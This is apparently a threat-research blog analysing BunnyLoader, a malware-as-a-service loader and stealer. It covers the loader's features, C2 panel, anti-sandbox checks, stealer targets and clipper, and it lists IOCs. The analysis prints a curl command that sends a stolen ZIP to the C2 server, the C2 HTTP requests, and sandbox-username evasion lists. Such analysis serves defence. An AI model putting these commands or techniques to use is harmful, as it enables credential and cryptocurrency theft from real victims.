ToddyCat is an advanced APT actor whose latest activity expands its loader and post-exploitation toolkit, detailing how it compromised public-facing servers, loaded a Ninja Trojan, and moved to data collection and exfiltration using multiple loaders and droppeâŚ
Category: Threat Research
Stayinâ Alive is an active campaign in Asia primarily targeting the telecom sector and government organizations, with activity in Kazakhstan, Uzbekistan, Pakistan, and Vietnam. The operation relies on disposable downloaders/loaders and DLL side-loading, all liâŚ
ASEC reports ShellBot malware is now installed on poorly managed Linux SSH servers using hexadecimal IP addresses for its download URLs. The campaign features DDoS PBot v2.0 with IRC-based C2 and hex-encoded endpoints used to evade URL detection. #ShellBot #DDâŚ
Qualys disclosed a critical GLIBC vulnerability (CVE-2023-4911, âLooney Tunablesâ) where parsing of the GLIBC_TUNABLES environment variable can overflow a buffer in the dynamic loader and lead to local privilege escalation by causing setuid binaries to load atâŚ
Phylum reports a targeted PyPI campaign where packages purporting to be cloud provider SDKs were modified to exfiltrate credentials. Attackers obfuscated a POST request and preserved the original functionality of the packages to avoid detection while sending kâŚ
Cyble CRIL identifies a spear-phishing campaign against a Russian semiconductor supplier that exploits the WinRAR CVE-2023-38831 vulnerability to drop the Mythic Athena agent. Athena, a Mythic C2 agent, provides a broad set of post-exploitation commands for reâŚ
A spike in phishing scams targets USPS customers with SMS messages that spoof the postal service and direct users to deceptive domains to harvest personal and financial data, as well as targeting other national postal services. The operation uses USPS-branded âŚ
ReversingLabs discovered a typosquatting npm package, node-hide-console-windows, that downloaded a DiscordRAT 2.0 executable which can deploy the r77 fileless ringâ3 rootkit to hide processes and paths. The malicious package also fetched a PyInstallerâcompiledâŚ
Two infostealer families, LummaC2 and RecordBreaker, are being distributed via abnormal certificates with unusually long Subject and Issuer fields, often undetectable by Windows alone. The operation shows a pattern of evolving C2 infrastructure, multi-stage paâŚ
FortiGuard Labs found multiple malicious NPM packages that execute install-time scripts to collect and exfiltrate sensitive data (Kubernetes configs, SSH keys, source code, user/home folders and system fingerprints). These packages use channels such as DiscordâŚ
ASEC observed the AgentTesla Infostealer being distributed via a spam email that delivers a malicious BAT file. The campaign uses a fileless technique to run AgentTesla in memory, loading a DLL through PowerShell and ultimately stealing browser credentials befâŚ
Snake Keylogger is a .NET infostealer whose delivery via a social-engineered email leads to credential theft and data exfiltration, analyzed here through a full ANY.RUN walkthrough. The post covers email inspection, attachment behavior, process and network actâŚ
APT34 used a malicious spear-phishing document (“MyCv.doc”) that drops a .NET backdoor named Menorah.exe and creates a scheduled task for persistence, then communicates with a hardcoded C2 over HTTP. The malware fingerprints hosts (MD5-based ID), executes shelâŚ
Introduction
In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service (MaaS) threat called âBunnyLoaderâ being sold on various forums. BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more. BunnyLoader employs a keylogger to log keystrokes as and a clipper to monitor the victimâs clipboard and replace cryptocurrency wallet addresses with actor-controlled cryptocurrency wallet addresses. Once the information is obtained, BunnyLoader encapsulates the data into a ZIP archive and proceeds to transmit the pilfered data to a command-and-control (C2) server. In this blog, weâll describe how BunnyLoader works and its technical components.
Key Takeaways
ThreatLabz identified a new malware loader written in C/C++ named âBunnyLoaderâ sold on various forums for $250.
BunnyLoader is under rapid development with multiple feature updates and bug fixes.
BunnyLoader employs various anti-sandbox techniques during its attack sequence.
BunnyLoader downloads and executes a second-stage payload, logs keys, steals sensitive information and cryptocurrency, and executes remote commands.
Basics
In early September, ThreatLabz came across a new malware loader named BunnyLoader. The malware was being sold on various forums by a user named âPLAYER_BUNNYâ/âPLAYER_BLâ, who seems to be one of the developers of the loader as shown in the figure below.
Figure 1: BunnyLoader advertisement from criminal forums.
Based on the advertisement, BunnyLoader has the following features:
Written in C/C++
Fileless loader – download & execute further malware stages in memory
Consists of stealer and clipper capabilities
Remote command execution
Incorporates anti-analysis techniques
Provides a web panel showcasing stealer logs, total clients, active tasks and much more
Price – $250 (Lifetime)
Since BunnyLoaderâs v1.0 initial release on September 4, 2023, the malware has been under rapid development, with many feature updates and bug fixes being released between the 4th of September and the time this blog was written (September 29 2023). In the table below, you can see that BunnyLoaderâs updates address bug issues, changes to the C2 panel, and even new pricing tiers.
BunnyLoader release history
Version
Date of Release
Updates
BunnyLoader v1.0
Sept 4, 2023
N/A
BunnyLoader v1.1
Sept 5, 2023
Client bug
Compress stealer logs before uploading
Command added for reverse shell: pwd
BunnyLoader v1.2
Sept 6, 2023
Added browser history recovery to stealer
Added NGRok auth-token recovery to stealer
Added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio, Iridium, Maxthon3)
BunnyLoader v1.3
Sept 9, 2023
Added credit card recovery to stealer function
Added support for 16 different credit card types
Fix C2 bugs
BunnyLoader v1.4
Sept 10, 2023
Implemented AV evasion
BunnyLoader v1.5
Sept 11, 2023
Added VPN recovery to stealer (ProtonVPN & OpenVPN)
Fix fileless loader bugs
Optimization in loading logs
BunnyLoader v1.6
Sept 12, 2023
Added downloads history viewer to stealer
Added anti-sandbox techniques
BunnyLoader v1.7
Sept 15, 2023
Implemented additional AV evasion
BunnyLoader v1.8
Sept 15, 2023
Implemented keylogger functionality
Bug fixes in execution of tasks
Fix C2 bugs
BunnyLoader v1.9
Sept 17, 2023
Added game recovery to stealer (Uplay & Minecraft)
Added 5 Chromium browser paths
Added 1 desktop wallet recovery to stealer
BunnyLoader v2.0
Sept 27, 2023
C2 GUI Changes
Fix critical vulnerabilities – SQL injection in the C2 Panel which would give access to the database and XSS vulnerabilities fixed
Major bugs fixed
C2 will detect and block exploit attempts
Optimization in stealer
Optimization in fileless loader
Selling private stub:
Advanced and proactive anti-analysis
Inject payload into memory (support x86/x64)
AV evasion
Persistence
New prices:
Payload – $250
Payload + Stub – $350
C2 Panel
The BunnyLoader C2 panel showcases a list of various tasks including:
downloading and executing additional malware
keylogging
stealing credentials
manipulating a victimâs clipboard to steal cryptocurrency
running remote commands on the infected machine
The parameters consisting of the download URL and the cryptocurrency wallet addresses are added in the panel as shown below.
Figure 2: A screenshot of the BunnyLoader C2 panel configuration.
The BunnyLoader panel also provides:
statistics for infections
the total connected/disconnected clients
active tasks
stealer logs and also
The information can be cleared from the panel.
Figure 3: A screenshot of the statistics and options to clear data in the BunnyLoader C2 panel.
In addition, the infected machines can be controlled remotely through the C2 panel, as shown in the screenshot below.
Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems.
Technical Analysis
In the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions:
Creates a new registry value named âSpyware_Blockerâ in the Run registry key (HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun) where the value is the path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the machine.
Hides the window using ShowWindow() with nCmdShow as SW_HIDE
Creates a mutex name âBunnyLoader_MUTEXCONTROLâ via CreateMutexW()
Performs the following anti-VM techniques:
Checks for the following modules:
SxIn.dll – 360 Total Security
cmdvrt32.dll / cmdvrt64.dll – Comodo Antivirus
wine_get_unix_file_name – Detects Wine
SbieDll.dll – Sandboxie
Checks for a VM using âROOTCIMV2â queries:
SELECT * FROM Win32_VideoController
Win32_Processor
Win32_NetworkAdapter
Win32_BIOS
SELECT * FROM Win32_ComputerSystem
Checks for a Docker container via â/proc/1/cgroupâ – if the container exists, BunnyLoader does not perform further malicious actions.
Checks for the following blacklisted sandbox usernames:
ANYRUN
Sandbox
Test
John Doe
Abby
Timmy
Maltest
malware
Emily
Timmy
Paul Jones
CurrentUser
IT-ADMIN
Walker
Lisa
WDAGUtilityAccount
Virus
fred
If a sandbox is identified, BunnyLoader throws the following error message:
âThe version of this file is not compatible with the current version of Windows you are running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.â
Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:
GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; charset=UTF-8
Connected
The registration request sent to the C2 server (shown above) contains the following information:
Information in C2 server request
Value
Description
country
Gathers the country where the infected system is connecting from via âhttp[:]//ip-api.com/csvâ where the user agent is âBunnyRequesterâ
ip
Gathers the victim IP from âhttp[:]//api.ipify.orgâ where the user agent is âBunnyRequesterâ
host
Gathers the hostname via GetComputerNameA
ver
The version of BunnyLoader (e.g., 2.0)
system
Fetches the operating system via âsysteminfo | findstr /B /C:"OS Nameâ
privs
Fetches the privileges of the current user via OpenProcessToken. Sends âAdminâ if the user is an administrator or sends the string âuserâ.
av
Gathers the anti-virus on the infected machine via wmic /namespace:rootSecurityCenter2 path AntiVirusProduct get displayName /value
The user agent for the request is set to âBunnyLoaderâ. If the response from the C2 is âConnectedâ, BunnyLoader performs the core malicious actions.
Task Execution
After registration, BunnyLoader sends a task request to the C2 server âhttp[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>â with the user agent as âBunnyTasksâ. As shown below, the response to the task request consists of the âIDâ, âNameâ and âParamsâ.
GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8
ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k
Here the "Name" is the module (functionality) to be executed and the âparamsâ are the parameters passed to the module. Based on the module name received in the task response, BunnyLoader further performs its actions.
BunnyLoader consists of the following tasks:
Trojan Downloader
Download and Execute (Fileless Execution)
Download and Execute (Disk Execution)
Intruder
Run Keylogger
Run Stealer
Clipper
Bitcoin
Monero
Ethereum
Litecoin
Dogecoin
ZCash
Tether
Remote Command Execution
Run Keylogger Task
BunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging key strokes. The output of the keylogger is stored in the file âC:Users<username>AppDataLocalKeystrokes.txtâ.
Run Stealer Task
BunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. Eventually the stolen information is stored in a folder named âBunnyLogsâ in the AppdataLocal Directory, which is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers targeted by BunnyLoader:
7Star7StarUser Data
YandexYandexBrowserUser Data
CentBrowserUser Data
ComodoUser Data
ChedotUser Data
360BrowserBrowserUser Data
VivaldiUser Data
Maxthon3User Data
KometaUser Data
K-MelonUser Data
Elements BrowserUser Data
GoogleChromeUser DataSputnikSputnikUser Data
Epic Privacy BrowserUser Data
NichromeUser Data
uCozMediaUranUser Data
CocCocBrowserUser Data
Fenrir IncSleipnir5settingmodulesChromiumViewer
UranUser Data
CatalinaGroupCitrioUser Data
ChromodoUser Data
CoowonCoowonUser Data
Mail.RuAtomUser Data
liebaoUser Data
MicrosoftEdgeUser Data
QIP SurfUser Data
BraveSoftwareBrave-BrowserUser Data
OrbitumUser Data
ChromiumUser Data
ComodoDragonUser Data
Google(x86)ChromeUser Data
AmigoUserUser Data
MapleStudioChromePlusUser Data
TorchUser Data
IridiumUser Data
BunnyLoader steals following information from these web browsers:
AutoFill data
Credit cards
Downloads
History
Passwords
The malware targets the following cryptocurrency wallets:
Armory
Exodus
AutomaticWallet
Bytecoin
Ethereum
Coinomi
Jaxx
Electrum
Guarda
BunnyLoader steals credentials from the following VPN clients:
ProtonVPN
OpenVPN
Credentials are also stolen from following messaging applications:
Skype
Tox
Signal
Element
ICQ
Examples of the stolen information are shown in the figure below. The logs consist of an information.txt file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information.
Figure 5: A screenshot of the information exfiltrated by BunnyLoader.
The stolen data is archived using the Powershell cmdlet: System.IO.Compression.ZipFile with the filename âBunnyLogs_<hostname>.zipâ. The ZIP archive is exfiltrated to the C2 server via the following CURL command:
cmd.exe /c curl -F
"file=@C:UsersuserAppDataLocalBunnyLogs_468325.zip"
http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php
BunnyLoader also performs a stealer registration request containing statistics related to the stolen information and the link to the exfiltrated logs with the user agent: âBunnyStealerâ, as shown below:
GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Micro
soft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin
k=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_
468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
Clipper Task
The BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.
In this case, the targeted cryptocurrencies are:
Bitcoin
Monero
Ethereum
Litecoin
Dogecoin
ZCash
Tether
The clipper receives the cryptocurrency wallet addresses to replace from the C2 server.
Download and Execute Task
BunnyLoader performs two types of download and execute functions.
The first type is downloading a file from a URL provided by the C2, which is written to disk in the AppDataLocal directory and further executed.
The second type uses fileless execution, where BunnyLoader creates a ânotepad.exeâ process in a suspended state and then downloads the payload from the received URL with the user agent âBunnyLoader_Dropperâ. The downloaded binary is stored in a memory buffer and BunnyLoader performs Process Hollowing to inject the downloaded payload into the ânotepad.exeâ process as shown in the figure below.
Figure 6: A screenshot of BunnyLoader fileless download and executing code.
After the tasks are completed, BunnyLoader sends the following task completion request with the user agent as âTaskCompletedâ and the CommandID as the Task ID. An example task completion request is shown below:
http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461
Remote Command Execution Task
BunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to be executed on the infected machine via an âechoerâ request to C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to âBunnyTasksâ as shown in the figure below. BunnyLoader parses the response and checks for the following commands: âhelpâ, âcdâ, âpwdâ and then executes the command using _popen and the command output is been sent across to the C2 server as the â&value=â parameter in a result command request: (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent: âBunnyShellâ.
Figure 7: A screenshot of BunnyLoader remote command execution.
BunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as shown below. The user agent for the heartbeat is âHeartBeat_Senderâ.
GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8
Client online
ConclusionBunnyLoader is a new MaaS threat that is continuously evolving their tactics and adding new features to carry out successful campaigns against their targets. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe.Win32.Downloader.BunnyLoaderIndicators of Compromise (IOCs)
C2 Server – 37[.]139[.]129[.]145/Bunny/
BunnyLoader samples:
dbf727e1effc3631ae634d95a0d88bf3
bbf53c2f20ac95a3bc18ea7575f2344b
59ac3eacd67228850d5478fd3f18df78
X-Force uncovered a global NetScaler Gateway credential harvesting campaign that exploits CVE-2023-3519 to inject a credential-harvesting script into authentication pages. Attackers used attacker-controlled domains, web shells, and NSPPE crash artifacts to enaâŚ